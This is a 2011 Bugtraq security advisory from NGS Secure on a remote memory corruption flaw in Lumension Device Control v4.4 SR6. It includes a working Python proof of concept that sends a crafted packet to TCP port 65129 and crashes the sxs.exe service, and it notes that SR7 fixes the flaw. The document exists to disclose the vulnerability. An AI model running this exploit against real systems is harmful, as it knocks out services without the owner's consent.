lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 24 Aug 2011 07:38:58 +0000
From: "Research@...Secure" <research@...secure.com>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>
Subject: NGS00054 Technical Advisory: : Lumension Device Control (formerly
 Sanctuary) remote memory corruption

=======
Summary
=======
Name: Lumension Device Control (formerly Sanctuary) remote memory corruption
Release Date: 24 August 2011
Reference: NGS00054
Discoverer: Andy Davis <andy.davis@...secure.com>
Vendor: Lumension
Vendor Reference: 
Systems Affected: Lumension Device Control v4.4 SR6
Risk: High
Status: Published

========
TimeLine
========
Discovered:  3 March 2011
Released:  3 March 2011
Approved:  3 March 2011
Reported:  3 March 2011
Fixed:     24 May 2011
Published:  24 August 2011

===========
Description
===========
By sending a specially crafted packet to TCP port 65129 the sxs.exe service running on the Lumension application server terminates

=================
Technical Details
=================

A simple PoC is presented here:

#!/usr/local/bin/python

import sys
from socket import *
import os

if (len(sys.argv)!=2):
	print "\n--------------------------------------------------"
	print "Usage: %s <target IP>" % sys.argv[0]
	print "--------------------------------------------------\n"
	exit(0)

host=sys.argv[1]
port=65129

packet1 =  "\xec\x02\x00\x00"	#length of remaining packet
packet1 += "\xc9\x00\x00\x00"	#some kind of packet ID?
#packet1 += "\x18\x00\x00\x00"
packet1 += "\x61\x61\x61\x61"	#crash occurs here

packet1 += "\xc8\x02\x00\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x01\x00"
packet1 += "\x00\x00\x0d\xd8\x91\x32\x61\xf4\x43\xa1\xe1\x8e\x27\x68\x6d\xde"
packet1 += "\xbe\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x95\x00\x05\x01"
packet1 += "\x03\x00\x00\x03\x01\x10\x02\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x34\x2e\x34\x2e\x31\x34\x35\x32" #client version
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd6\x5e"
packet1 += "\xe0\x81\xdb\xd8\xcb\x01\xe4\x95\x45\xe1\xdb\xd8\xcb\x01\x7c\x99"
packet1 += "\x47\xbc\xdb\xd8\xcb\x01\xd6\xbc\xb0\x34\xdc\xd8\xcb\x01\x02\x00"
packet1 += "\x00\x00\x9c\x47\x57\x00\xd4\xf8\x27\xe3\x51\xdf\xc9\x48\x82\xc3"
packet1 += "\xdb\x73\xbf\x42\xce\x77\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00"
packet1 += "\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
packet1 += "\xc0\xa8\x00\x6b" #client IP address
packet1 += "\xff\xff\xff\x00" #client subnet mask
packet1 += "\x61\x00\x63\x00\x65\x00\x72\x00\x2d\x00\x65\x00\x38\x00"
packet1 += "\x31\x00\x37\x00\x66\x00\x61\x00\x65\x00\x30\x00\x64\x00\x38\x00" # client hostname
packet1 += "\x00" * 480
packet1 += "\x00\x00\x40\xfc\xba\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80"
packet1 += "\x85\xcc\x23\x00\x00\x00\x80\xee\x36\x00\x93\x84\xde\x84\x02\x00"
packet1 += "\x00\x00\x00\x00\x00\x00"

s = socket(AF_INET, SOCK_STREAM)
s.connect((host, port))
s.send(packet1)
print s.recv(1024)
s.close()

===============
Fix Information
===============

This issue is addressed in SR7, which can be downloaded by registered customers at:
https://portal.lumension.com/

NGS Secure Research
http://www.ngssecure.com

Powered by blists - more mailing lists